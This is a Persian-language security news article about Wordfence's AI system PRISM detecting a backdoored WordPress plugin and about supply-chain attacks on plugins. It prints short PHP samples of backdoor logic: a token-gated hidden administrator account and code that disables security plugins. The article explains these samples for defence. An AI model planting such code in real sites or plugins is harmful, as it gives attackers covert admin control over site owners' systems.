جستجو
برای جستجو متن مورد نظر وارد کنید و Enter بزنید برای بستن Esc بزنید.
سیستم امنیتی PRISM شرکت Wordfence موفق شد یک افزونه وردپرس آلوده به بکدور را تنها کمتر از دو ساعت پس از ورود کد مخرب شناسایی کند. این رخداد نمونهای از افزایش حملات زنجیره تأمین در اکوسیستم وردپرس است که در آن مهاجمان به جای هدف قرار دادن مستقیم سایتها، کد مخرب را از طریق افزونههای مورد اعتماد وارد میکنند.
این حادثه نشان میدهد ابزارهای مبتنی بر هوش مصنوعی میتوانند زمان شناسایی تهدیدهای امنیتی را کاهش دهند و پیش از گسترش یک حمله، هشدارهای لازم را در اختیار تیمهای امنیتی قرار دهند.
وردپرس به دلیل استفاده گسترده از افزونههای شخص ثالث، همواره یکی از اهداف مهم مهاجمان سایبری بوده است. بسیاری از حملات گذشته از طریق آسیبپذیریهای موجود در افزونهها انجام شدهاند، اما در سالهای اخیر روشهای پیچیدهتری مانند حملات زنجیره تأمین افزایش پیدا کردهاند.
در جدیدترین گزارش Wordfence، سیستم PRISM این شرکت توانست یک افزونه وردپرس را که بهصورت عمدی با کد مخرب آلوده شده بود، تنها دو ساعت پس از انتشار تغییرات شناسایی کند.
در این نوع حملات، توسعهدهنده یا منبع انتشار افزونه به نقطهای برای ورود بدافزار تبدیل میشود. کاربر تصور میکند در حال دریافت یک بهروزرسانی معمولی است، اما نسخه جدید میتواند شامل مسیر مخفی برای دسترسی مهاجم باشد.
در حملات معمولی، مهاجم معمولا یک ضعف امنیتی در سایت یا نرمافزار پیدا میکند و از همان مسیر وارد سیستم میشود. اما در حملات زنجیره تأمین، هدف اصلی زیرساختی است که کاربران به آن اعتماد دارند.
در اکوسیستم وردپرس، این زنجیره میتواند شامل موارد زیر باشد:
اگر مهاجم بتواند یکی از این بخشها را کنترل کند، نسخه آلوده میتواند بدون جلب توجه تعداد زیادی از سایتها را تحت تأثیر قرار دهد.
بررسیهای امنیتی نشان داد کد مخرب افزونه با هدف ایجاد دسترسی غیرمجاز طراحی شده بود. چنین بکدورهایی معمولا تلاش میکنند بدون نیاز به ورود کاربر، سطح دسترسی مدیر سایت را برای مهاجم فراهم کنند.
یکی از روشهای رایج در این حملات، ایجاد حساب کاربری مدیریتی مخفی است. ساختار ساده چنین عملکردی میتواند مشابه نمونه زیر باشد:
if (isset($_REQUEST['token']) && $_REQUEST['token'] === 'SECRET_TOKEN') {
$user_id = wp_create_user(
'new_admin',
'password123',
'admin@example.com'
);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
این کد نمونه نشان میدهد یک مهاجم چگونه میتواند از توابع داخلی وردپرس برای ایجاد یک کاربر جدید با سطح دسترسی مدیر استفاده کند.
در حملات واقعی، مهاجمان معمولا این منطق را با روشهای مختلف مخفیسازی ترکیب میکنند تا بررسی دستی فایلها دشوارتر شود.
یکی از خطرناکترین قابلیتهای بکدورهای وردپرسی، امکان ساخت حساب مدیریتی بدون اطلاع مالک سایت است.
نمونه سادهای از این رفتار:
$new_user = wp_insert_user([
'user_login' => 'support_admin',
'user_pass' => 'temporary_password',
'role' => 'administrator'
]);
پس از ایجاد چنین حسابی، مهاجم میتواند وارد پیشخوان وردپرس شود و اقداماتی مانند تغییر محتوا، نصب افزونههای مخرب، سرقت اطلاعات یا ایجاد لینکهای اسپم برای دستکاری رتبه سایت در موتورهای جستجو را انجام دهد.
برخی بکدورها علاوه بر ایجاد کاربر مدیر، قابلیت کنترل بخشهای مختلف سایت را نیز فراهم میکنند. برای مثال مهاجم ممکن است تلاش کند افزونههای امنیتی را غیرفعال کند یا یک افزونه مخرب دیگر را فعال نگه دارد.
نمونه ساده این رفتار:
activate_plugin('malicious-plugin/plugin.php');
deactivate_plugins('security-plugin/security.php');
در نمونههای واقعی، این دستورات معمولا به شکل پیچیدهتر و همراه با روشهای پنهانسازی اجرا میشوند.
PRISM یک سیستم تحلیل امنیتی مبتنی بر هوش مصنوعی است که برای بررسی کدهای وردپرس، شناسایی تغییرات مشکوک و تحلیل رفتار افزونهها توسعه یافته است.
تفاوت اصلی چنین سیستمهایی با روشهای سنتی، سرعت بررسی آنها است. در گذشته ممکن بود یک افزونه آلوده مدت زیادی در دسترس کاربران باقی بماند تا زمانی که محققان امنیتی یا کاربران متوجه رفتار غیرعادی شوند.
اما در این حادثه، PRISM توانست مدت کوتاهی پس از اضافه شدن کد مخرب، نشانههای غیرطبیعی را تشخیص دهد و فرآیند بررسی امنیتی را آغاز کند.
وجود یک بکدور در افزونه میتواند پیامدهای گستردهای برای یک سایت داشته باشد. مهاجم پس از ورود میتواند:
برای سایتهای تجاری، چنین حملاتی علاوه بر خسارت فنی میتوانند باعث کاهش رتبه در موتورهای جستجو و از دست رفتن اعتماد کاربران شوند.
برای کاهش خطر حملات مشابه، مدیران سایتهای وردپرسی باید فرآیند امنیتی منظم داشته باشند.
بررسی کاربران مدیر یکی از اولین اقدامها است. وجود یک حساب مدیریتی ناشناس میتواند نشانه نفوذ باشد.
همچنین بهتر است:
برای بررسی فایلهای مشکوک نیز میتوان تغییرات غیرعادی در فایلهای PHP افزونهها را بررسی کرد. فایلهایی که بهتازگی تغییر کردهاند یا شامل توابعی مانند eval، base64_decode و اجرای دستورات غیرمعمول هستند، نیاز به بررسی دقیق دارند.
افزایش حملات پیچیده علیه افزونههای وردپرس نشان میدهد روشهای سنتی مقابله با تهدیدها دیگر کافی نیستند. سیستمهایی مانند PRISM تلاش میکنند با تحلیل سریع کد و رفتار نرمافزار، تهدیدها را پیش از گسترش شناسایی کنند.
کشف یک بکدور تنها در مدت کمتر از دو ساعت نشان میدهد سرعت واکنش در امنیت سایبری اهمیت زیادی دارد. برای میلیونها سایت وردپرسی، فاصله میان انتشار یک نسخه آلوده و شناسایی آن میتواند تفاوت میان یک حادثه محدود و یک حمله گسترده باشد.